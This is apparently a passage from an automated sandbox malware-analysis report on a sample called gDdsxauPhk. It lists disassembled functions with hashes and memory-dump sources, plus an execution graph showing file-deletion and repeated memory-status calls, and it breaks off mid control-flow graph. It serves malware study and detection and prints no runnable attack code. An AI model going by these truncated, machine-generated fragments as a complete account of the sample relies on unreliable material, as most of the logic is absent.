                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d9a87f698032b96632d9d51d9527a2da18575104853188f31b604e6ed431fd42
                                                        • Instruction ID: b392aeaf60467276773a4b7df2c59ad93b65f8bdfd5e3cf936658cd02f7b6b00
                                                        • Opcode Fuzzy Hash: d9a87f698032b96632d9d51d9527a2da18575104853188f31b604e6ed431fd42
                                                        • Instruction Fuzzy Hash: D4E0E574E09208EFCB84EFA8D4856ACFBF4EB48300F10C1A9981897341D6319A41CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A1A3A8 Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c47960ac4ede880b8125a05a10eed2dcfc52c0a5d07c206f896c7ec937a2d31
                                                        • Instruction ID: 314b712e8185632a1407fec14eff39bdc101c5ee70e978e36289a611ef9c3319
                                                        • Opcode Fuzzy Hash: 5c47960ac4ede880b8125a05a10eed2dcfc52c0a5d07c206f896c7ec937a2d31
                                                        • Instruction Fuzzy Hash: 8FE0127194A209DFC780EFE4D5046AEBBFEEB0A201F0095A5960A9B150FE724E45EF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A1BAE8 Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 287108914b9beb435340fba36c3b151eb840cb8660e80f38447a19f2ff524356
                                                        • Instruction ID: c7d6d66739c704b0b06a0f377361c40430e8f1f6d4556853efaa6789e58a355a
                                                        • Opcode Fuzzy Hash: 287108914b9beb435340fba36c3b151eb840cb8660e80f38447a19f2ff524356
                                                        • Instruction Fuzzy Hash: 49E0C27094B10CEBC781FFA895009AE77FDDB0A200F0184A5D1058B110EA724E54DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A19F10 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 58c1a9b4a55188f3f9aab880761273e72efb39317efaef4477f528007afbdb6f
                                                        • Instruction ID: 46fd00e4162851aba754938404e6e9d0068de6a1ce54567b1851fa8d14b8cdd5
                                                        • Opcode Fuzzy Hash: 58c1a9b4a55188f3f9aab880761273e72efb39317efaef4477f528007afbdb6f
                                                        • Instruction Fuzzy Hash: 65D01276601154CFDB14AF64E404ADDB779DB4D352F0080A6E60AEB514CB3596168FA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06D36ED8 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 95e504539c759a6f021d344aa5042c316c6ab8e07d02fa5d8e78b577958bfad2
                                                        • Instruction ID: 24678686385369469d572b0bdf2df237d86ea9adbb4759873634adae5f866ec2
                                                        • Opcode Fuzzy Hash: 95e504539c759a6f021d344aa5042c316c6ab8e07d02fa5d8e78b577958bfad2
                                                        • Instruction Fuzzy Hash: A4C08070501308DBC350DFF9E80875977ADDF05265F004055E918D7140DFF15544C665
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A19F74 Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 71c0fc346635379c51946b60d532fbf2e79321bcfdd2d507c43fdb96b7e9b4f0
                                                        • Instruction ID: bee576d7200c20b7c2d9817c352c8b0fae9175765c23f3b674a75656d997a42f
                                                        • Opcode Fuzzy Hash: 71c0fc346635379c51946b60d532fbf2e79321bcfdd2d507c43fdb96b7e9b4f0
                                                        • Instruction Fuzzy Hash: ADE01778E0421ACFDB64DF28D440BADB7B2FB48304F1000A8D519A771AE7706E81CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A1A105 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7ca936bd44c636004ccfd63a58c562f6b56cc95ea2a11316f3ba7ae0bff4a37d
                                                        • Instruction ID: 7543f5b6b7e20cb5370a9d5a9537ba3f18e1f6fb050ff5f29aeb6e7f8e423e1e
                                                        • Opcode Fuzzy Hash: 7ca936bd44c636004ccfd63a58c562f6b56cc95ea2a11316f3ba7ae0bff4a37d
                                                        • Instruction Fuzzy Hash: C3E04278905219CFFB94DF64DD54B9DB7B2FB48300F108195D90EAB385DA715A84CF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A19E33 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd461c57ae9e3eeb67623d351d85362e92830d738deb5b24af8826d193b20acb
                                                        • Instruction ID: b5d1ae3eab09f4879b60b6b9ef92e6f8c2d33c6dd3e9500a1c23fe2d63259be8
                                                        • Opcode Fuzzy Hash: dd461c57ae9e3eeb67623d351d85362e92830d738deb5b24af8826d193b20acb
                                                        • Instruction Fuzzy Hash: 4DD09234908298CFCB80EF90D8986ACBBB5BB19302F1094A5910FAA245CB311984CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A1E823 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4e12a98e0fb9a7a34ef50be0af82f8b4484fd2408073329ebdbdf0d15dc16e29
                                                        • Instruction ID: d7330af8f7c46b56a9227f3c77f7ce2692ac6e6bcba22abb0433413a92f6c7ef
                                                        • Opcode Fuzzy Hash: 4e12a98e0fb9a7a34ef50be0af82f8b4484fd2408073329ebdbdf0d15dc16e29
                                                        • Instruction Fuzzy Hash: 68C08C30402300C7C2603BE5F50C3AA3A2AA704232F040021FF0D8A050CFB54493CBAA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A1E828 Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f9eabd6c391330917343f4b4766ceecf025426a7eac622c4ef6f1a926f38b93d
                                                        • Instruction ID: 2968feeebd0307050cabb074c83c01571a49f34d766e16f9b2655f1c9872d41c
                                                        • Opcode Fuzzy Hash: f9eabd6c391330917343f4b4766ceecf025426a7eac622c4ef6f1a926f38b93d
                                                        • Instruction Fuzzy Hash: 32C08C3000230487C2502BAAB50C3693B69A700232F440021F708850508EB45082CB29
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06D3E41C Relevance: .0, Instructions: 8COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1769219286.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6d30000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc2013c76a678c85cd34d73c86a64515c6cfc9caeb885aa6ff3d2d9cf59c6821
                                                        • Instruction ID: 89896c6bec493626271103d74c66921bfc8a48e2417b7de0647c65b00d44d34e
                                                        • Opcode Fuzzy Hash: cc2013c76a678c85cd34d73c86a64515c6cfc9caeb885aa6ff3d2d9cf59c6821
                                                        • Instruction Fuzzy Hash: 56B012655E4710A6FA8063644F50D3BEAA1FBBD700B008C26B38550058C860C464D27F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A17F60 Relevance: .0, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a395fa17e5ccc614d9133f09f2df3dfc1f53e91879dbc6656f804608b570d0fb
                                                        • Instruction ID: 3b7de6b061446d60b7f8c9282ec3a45da301db3083e440000166a89c328ecda9
                                                        • Opcode Fuzzy Hash: a395fa17e5ccc614d9133f09f2df3dfc1f53e91879dbc6656f804608b570d0fb
                                                        • Instruction Fuzzy Hash: D1B09230190209CFC2009B58E448E6137E8AB08A04F0100F0E1088B632D621F8008A91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 06A1C388 Relevance: 5.3, Strings: 4, Instructions: 259COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T+-q$[V~*$[V~*$]\`
                                                        • API String ID: 0-1849991408
                                                        • Opcode ID: 4aada9b94a7c923530b05f5fead0d61519773f300394766398abc54fcc204987
                                                        • Instruction ID: 21d64de16f43464ba19786c6f9208d9f767625b81a98031b9b87cd23a124d021
                                                        • Opcode Fuzzy Hash: 4aada9b94a7c923530b05f5fead0d61519773f300394766398abc54fcc204987
                                                        • Instruction Fuzzy Hash: 45B11870E592299FCB44DFEAD5808AEFBF2BF88310B14E52AD416BB214D3349901CF58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A15570 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$B$B$Hbq
                                                        • API String ID: 0-1093311442
                                                        • Opcode ID: 2d91dd7f270e556396462e5823c19cb56a4f2387933943e9d8ef3bf75ea4d4fb
                                                        • Instruction ID: ee34107787f85bc0fff7ca41fe9e2e7ca7c40ef753b686dbf145005c6cf2c1c1
                                                        • Opcode Fuzzy Hash: 2d91dd7f270e556396462e5823c19cb56a4f2387933943e9d8ef3bf75ea4d4fb
                                                        • Instruction Fuzzy Hash: B0518E75B002058FCB64EF78D88456ABBF6EFC9220724856AD419CF761DB31EC46CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A184C0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq$$^q$$^q$$^q
                                                        • API String ID: 0-314989797
                                                        • Opcode ID: 3c9488d60ce5cbca6f2150db8d667fc53cf231ab5cd55512aee732b946b4f051
                                                        • Instruction ID: 9f307ddd74d49426f336542e3c60e7d0164c64ef566f5356a2811266c7514683
                                                        • Opcode Fuzzy Hash: 3c9488d60ce5cbca6f2150db8d667fc53cf231ab5cd55512aee732b946b4f051
                                                        • Instruction Fuzzy Hash: 06B1C130B102048FDBA4EF69C944BAEB7F2EF85320F14856AD416DF295DB78D846CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A15560 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1768906730.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6a10000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$B$B
                                                        • API String ID: 0-685577651
                                                        • Opcode ID: 867f2c5ddb5bc135400959f569c7062fc7d9bc10238aed36aee9661d947b36cd
                                                        • Instruction ID: 8a12e7fecf4df6ff25978f6bea1124ba2872e8c6b2e4066ee47632b1b8be9d0b
                                                        • Opcode Fuzzy Hash: 867f2c5ddb5bc135400959f569c7062fc7d9bc10238aed36aee9661d947b36cd
                                                        • Instruction Fuzzy Hash: 65216BB5E002198FDBA4EF69C8849AEBBB6EFC9220B184066D025DF261D730DC41CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:12.6%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:27
                                                        Total number of Limit Nodes:6
                                                        execution_graph 24125 1408170 24126 14081b6 DeleteFileW 24125->24126 24128 14081ef 24126->24128 24129 1400848 24130 140084e 24129->24130 24131 140091b 24130->24131 24134 14014b7 24130->24134 24140 140138f 24130->24140 24136 14013a6 24134->24136 24137 14014bb 24134->24137 24135 14014b4 24135->24130 24136->24135 24139 14014b7 2 API calls 24136->24139 24145 1408348 24136->24145 24137->24130 24139->24136 24141 1401383 24140->24141 24142 1401393 24140->24142 24141->24130 24142->24141 24143 14014b7 2 API calls 24142->24143 24144 1408348 2 API calls 24142->24144 24143->24142 24144->24142 24146 1408352 24145->24146 24147 140836c 24146->24147 24150 6b4f9f7 24146->24150 24154 6b4fa08 24146->24154 24147->24136 24151 6b4fa1d 24150->24151 24152 6b4fc2e 24151->24152 24153 6b4fc49 GlobalMemoryStatusEx GlobalMemoryStatusEx 24151->24153 24152->24147 24153->24151 24155 6b4fa1d 24154->24155 24156 6b4fc2e 24155->24156 24157 6b4fc49 GlobalMemoryStatusEx GlobalMemoryStatusEx 24155->24157 24156->24147 24157->24155

                                                        Executed Functions

                                                        Function 06B43438 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 125 6b43438-6b43459 126 6b4345b-6b4345e 125->126 127 6b43484-6b43487 126->127 128 6b43460-6b4347f 126->128 129 6b4348d-6b434ac 127->129 130 6b43c28-6b43c2a 127->130 128->127 138 6b434c5-6b434cf 129->138 139 6b434ae-6b434b1 129->139 132 6b43c31-6b43c34 130->132 133 6b43c2c 130->133 132->126 135 6b43c3a-6b43c43 132->135 133->132 142 6b434d5-6b434e6 call 6b43024 138->142 139->138 140 6b434b3-6b434c3 139->140 140->142 145 6b434eb-6b434f0 142->145 146 6b434f2-6b434f8 145->146 147 6b434fd-6b437da 145->147 146->135 168 6b437e0-6b4388f 147->168 169 6b43c1a-6b43c27 147->169 178 6b43891-6b438b6 168->178 179 6b438b8 168->179 181 6b438c1-6b438d4 call 6b43030 178->181 179->181 184 6b43c01-6b43c0d 181->184 185 6b438da-6b438fc call 6b4303c 181->185 184->168 186 6b43c13 184->186 185->184 189 6b43902-6b4390c 185->189 186->169 189->184 190 6b43912-6b4391d 189->190 190->184 191 6b43923-6b439f9 190->191 203 6b43a07-6b43a37 191->203 204 6b439fb-6b439fd 191->204 208 6b43a45-6b43a51 203->208 209 6b43a39-6b43a3b 203->209 204->203 210 6b43ab1-6b43ab5 208->210 211 6b43a53-6b43a57 208->211 209->208 213 6b43bf2-6b43bfb 210->213 214 6b43abb-6b43af7 210->214 211->210 212 6b43a59-6b43a83 211->212 221 6b43a85-6b43a87 212->221 222 6b43a91-6b43aae call 6b43048 212->222 213->184 213->191 225 6b43b05-6b43b13 214->225 226 6b43af9-6b43afb 214->226 221->222 222->210 229 6b43b15-6b43b20 225->229 230 6b43b2a-6b43b35 225->230 226->225 229->230 233 6b43b22 229->233 234 6b43b37-6b43b3d 230->234 235 6b43b4d-6b43b5e 230->235 233->230 236 6b43b41-6b43b43 234->236 237 6b43b3f 234->237 239 6b43b76-6b43b82 235->239 240 6b43b60-6b43b66 235->240 236->235 237->235 244 6b43b84-6b43b8a 239->244 245 6b43b9a-6b43beb 239->245 241 6b43b68 240->241 242 6b43b6a-6b43b6c 240->242 241->239 242->239 246 6b43b8c 244->246 247 6b43b8e-6b43b90 244->247 245->213 246->245 247->245
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-2392861976
                                                        • Opcode ID: ee90073d7f717a9020c8a5b57164c4f3e34871b2e6f7974525ff7d7c7f062c3e
                                                        • Instruction ID: c47e098b665d3193e19cb3cbac365a251dba615cf135a973a1546dacd8196e10
                                                        • Opcode Fuzzy Hash: ee90073d7f717a9020c8a5b57164c4f3e34871b2e6f7974525ff7d7c7f062c3e
                                                        • Instruction Fuzzy Hash: 97321D31E1065A8FCB54EF79C89459DB7F2FF89300F1486A9D409AB264EF34AD85CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B47D50 Relevance: 3.0, Strings: 2, Instructions: 474COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 797 6b47d50-6b47d6e 798 6b47d70-6b47d73 797->798 799 6b47d94-6b47d97 798->799 800 6b47d75-6b47d8f 798->800 801 6b47d99-6b47db5 799->801 802 6b47dba-6b47dbd 799->802 800->799 801->802 803 6b47dbf-6b47dc9 802->803 804 6b47dca-6b47dcd 802->804 806 6b47de4-6b47de6 804->806 807 6b47dcf-6b47ddd 804->807 809 6b47ded-6b47df0 806->809 810 6b47de8 806->810 813 6b47df6-6b47e0c 807->813 815 6b47ddf 807->815 809->798 809->813 810->809 817 6b48027-6b48031 813->817 818 6b47e12-6b47e1b 813->818 815->806 819 6b47e21-6b47e3e 818->819 820 6b48032-6b4803c 818->820 827 6b48014-6b48021 819->827 828 6b47e44-6b47e6c 819->828 823 6b48093-6b4809e 820->823 824 6b4803e-6b48067 820->824 834 6b480a0-6b480e4 823->834 835 6b48083-6b48090 823->835 826 6b48069-6b4806c 824->826 829 6b482a1-6b482a4 826->829 830 6b48072-6b48081 826->830 827->817 827->818 828->827 850 6b47e72-6b47e7b 828->850 832 6b482a6-6b482c2 829->832 833 6b482c7-6b482ca 829->833 830->834 830->835 832->833 838 6b48375-6b48377 833->838 839 6b482d0-6b482dc 833->839 845 6b48275-6b4828b 834->845 846 6b480ea-6b480fb 834->846 835->823 841 6b4837e-6b48381 838->841 842 6b48379 838->842 849 6b482e7-6b482e9 839->849 841->826 847 6b48387-6b48390 841->847 842->841 845->829 862 6b48260-6b4826f 846->862 863 6b48101-6b4811e 846->863 853 6b48301-6b48305 849->853 854 6b482eb-6b482f1 849->854 850->820 858 6b47e81-6b47e9d 850->858 855 6b48307-6b48311 853->855 856 6b48313 853->856 859 6b482f5-6b482f7 854->859 860 6b482f3 854->860 861 6b48318-6b4831a 855->861 856->861 870 6b48002-6b4800e 858->870 871 6b47ea3-6b47ecd 858->871 859->853 860->853 865 6b4831c-6b4831f 861->865 866 6b4832b-6b48364 861->866 862->845 862->846 863->862 875 6b48124-6b4821a call 6b46580 863->875 865->847 866->830 885 6b4836a-6b48374 866->885 870->827 870->850 882 6b47ed3-6b47efb 871->882 883 6b47ff8-6b47ffd 871->883 932 6b4821c-6b48226 875->932 933 6b48228 875->933 882->883 891 6b47f01-6b47f2f 882->891 883->870 891->883 897 6b47f35-6b47f3e 891->897 897->883 898 6b47f44-6b47f76 897->898 906 6b47f81-6b47f9d 898->906 907 6b47f78-6b47f7c 898->907 906->870 909 6b47f9f-6b47ff6 call 6b46580 906->909 907->883 908 6b47f7e 907->908 908->906 909->870 934 6b4822d-6b4822f 932->934 933->934 934->862 935 6b48231-6b48236 934->935 936 6b48244 935->936 937 6b48238-6b48242 935->937 938 6b48249-6b4824b 936->938 937->938 938->862 939 6b4824d-6b48259 938->939 939->862
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.4127561671.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_6b40000_gDdsxauPhk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q
                                                        • API String ID: 0-355816377
                                                        • Opcode ID: c2ee7ffb60930d58eb217538b08a5f05a99ef474202b5b74c843d6c802616e09
                                                        • Instruction ID: c48d5c2d8be68c8fe9311bd1ff86b25c1d8243bf00bd7ddd017b9c5b1ddbf114
                                                        • Opcode Fuzzy Hash: c2ee7ffb60930d58eb217538b08a5f05a99ef474202b5b74c843d6c802616e09
                                                        • Instruction Fuzzy Hash: F3029D70B102159FDB54EF68D5906AEB7E2FF84304F1485A9E406AB394DF35EC46CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06B45570 Relevance: 1.9, Strings: 1, Instructions: 602COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1277 6b45570-6b4558d 1278 6b4558f-6b45592 1277->1278 1279 6b45594-6b4559b 1278->1279 1280 6b455a0-6b455a3 1278->1280 1279->1280 1281 6b455a5-6b455ab 1280->1281 1282 6b455b6-6b455b9 1280->1282 1283 6b455b1 1281->1283 1284 6b456cc-6b456da 1281->1284 1285 6b455c1-6b455c4 1282->1285 1286 6b455bb-6b455bc 1282->1286 1283->1282 1293 6b456e1-6b456e4 1284->1293 1287 6b455d5-6b455d8 1285->1287 1288 6b455c6-6b455ca 1285->1288 1286->1285 1291 6b4560d-6b45610 1287->1291 1292 6b455da-6b455dd 1287->1292 1289 6b455d0 1288->1289 1290 6b4573c-6b45748 1288->1290 1289->1287 1295 6b45617-6b4561a 1291->1295 1296 6b45612-6b45614 1291->1296 1297 6b455e3-6b455ee 1292->1297 1298 6b45749-6b45773 1292->1298 1294 6b456e9-6b456ec 1293->1294 1299 6b45703-6b45706 1294->1299 1300 6b456ee-6b456fe 1294->1300 1295->1281 1301 6b4561c-6b4561f 1295->1301 1296->1295 1297->1298 1302 6b455f4-6b455fe 1297->1302 1314 6b4577d-6b45780 1298->1314 1306 6b45708-6b45725 1299->1306 1307 6b4572a-6b4572c 1299->1307 1300->1299 1304 6b45636-6b45639 1301->1304 1305 6b45621-6b45631 1301->1305 1302->1298 1308 6b45604-6b45608 1302->1308 1310 6b45643-6b45646 1304->1310 1311 6b4563b-6b4563e 1304->1311 1305->1304 1306->1307 1312 6b45733-6b45736 1307->1312 1313 6b4572e 1307->1313 1308->1291 1317 6b45655-6b45658 1310->1317 1318 6b45648-6b4564e 1310->1318 1311->1310 1312->1278 1312->1290 1313->1312 1319 6b457a2-6b457a5 1314->1319 1320 6b45782-6b45786 1314->1320 1317->1318 1322 6b4565a-6b4565d 1317->1322 1318->1292 1321 6b45650 1318->1321 1325 6b457b6-6b457b9 1319->1325 1326 6b457a7-6b457b1 1319->1326 1323 6b4578c-6b45794 1320->1323 1324 6b4586e-6b458ac 1320->1324 1321->1317 1328 6b45667-6b4566a 1322->1328 1329 6b4565f-6b45662 1322->1329 1323->1324 1332 6b4579a-6b4579d 1323->1332 1346 6b458ae-6b458b1 1324->1346 1333 6b457db-6b457de 1325->1333 1334 6b457bb-6b457bf 1325->1334 1326->1325 1330 6b4566c-6b45672 1328->1330 1331 6b45679-6b4567c 1328->1331 1329->1328 1330->1329 1335 6b45674 1330->1335 1336 6b4567e-6b45694 1331->1336 1337 6b45699-6b4569c 1331->1337 1332->1319 1341 6b457e0-6b457e4 1333->1341 1342 6b457fc-6b457ff 1333->1342 1334->1324 1340 6b457c5-6b457cd 1334->1340 1335->1331 1336->1337 1347 6b4569e-6b456a7 1337->1347 1348 6b456a8-6b456ab 1337->1348 1340->1324 1349 6b457d3-6b457d6 1340->1349 1341->1324 1343 6b457ea-6b457f2 1341->1343 1344 6b45801-6b45808 1342->1344 1345 6b4580f-6b45812 1342->1345 1343->1324 1350 6b457f4-6b457f7 1343->1350 1351 6b45866-6b4586d 1344->1351 1352 6b4580a 1344->1352 1354 6b45814-6b4581b 1345->1354 1355 6b4581c-6b4581f 1345->1355 1356 6b458b3-6b458c4 1346->1356 1357 6b458cf-6b458d2 1346->1357 1358 6b456c7-6b456ca 1348->1358 1359 6b456ad-6b456c2 1348->1359 1349->1333 1350->1342 1352->1345 1360 6b45837-6b4583a 1355->1360 1361 6b45821-6b45832 1355->1361 1373 6b45bcd-6b45bd4 1356->1373 1374 6b458ca 1356->1374 1362 6b458d8-6b45a6c 1357->1362 1363 6b45bbb-6b45bbe 1357->1363 1358->1284 1358->1294 1359->1358 1368 6b45854-6b45856 1360->1368 1369 6b4583c-6b45840 1360->1369 1361->1360 1426 6b45ba5-6b45bb8 1362->1426 1427 6b45a72-6b45a79 1362->1427 1365 6b45bc0-6b45bc5 1363->1365 1366 6b45bc8-6b45bcb 1363->1366 1365->1366 1366->1373 1375 6b45bd9-6b45bdc 1366->1375 1370 6b4585d-6b45860 1368->1370 1371 6b45858 1368->1371 1369->1324 1376 6b45842-6b4584a 1369->1376 1370->1314 1370->1351 1371->1370 1373->1375 1374->1357 1378 6b45bf4-6b45bf7 1375->1378 1379 6b45bde-6b45bf1 1375->1379 1376->1324 1380 6b4584c-6b4584f 1376->1380 1382 6b45c11-6b45c14 1378->1382 1383 6b45bf9-6b45c0a 1378->1383 1380->1368 1382->1362 1384 6b45c1a-6b45c1d 1382->1384 1389 6b45c45-6b45c56 1383->1389 1390 6b45c0c 1383->1390 1384->1362 1388 6b45c23-6b45c26 1384->1388 1391 6b45c40-6b45c43 1388->1391 1392 6b45c28-6b45c39 1388->1392 1389->1373 1399 6b45c5c 1389->1399 1390->1382 1391->1389 1394 6b45c61-6b45c64 1391->1394 1392->1379 1403 6b45c3b 1392->1403 1395 6b45c66-6b45c6d 1394->1395 1396 6b45c72-6b45c75 1394->1396 1395->1396 1400 6b45c77-6b45c88 1396->1400 1401 6b45c93-6b45c95 1396->1401 1399->1394 1400->1373 1409 6b45c8e 1400->1409 1404 6b45c97 1401->1404 1405 6b45c9c-6b45c9f 1401->1405 1403->1391 1404->1405 1405->1346 1408 6b45ca5-6b45cae 1405->1408 1409->1401 1428 6b45b2d-6b45b34 1427->1428 1429 